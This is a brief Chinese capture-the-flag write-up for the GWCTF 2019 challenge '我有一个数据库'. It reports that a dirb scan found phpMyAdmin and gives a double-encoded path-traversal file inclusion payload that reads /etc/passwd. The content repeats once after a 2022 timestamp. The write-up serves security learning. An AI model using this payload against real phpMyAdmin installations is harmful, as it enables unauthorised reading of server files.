[GWCTF 2019]我有一个数据库
dirb扫描到后台有phpmyadmin目录
存在phpMyadmin后台任意文件包含漏洞
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
拿到flag
2022-08-21 13:27:39
dirb扫描到后台有phpmyadmin目录
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
拿到flag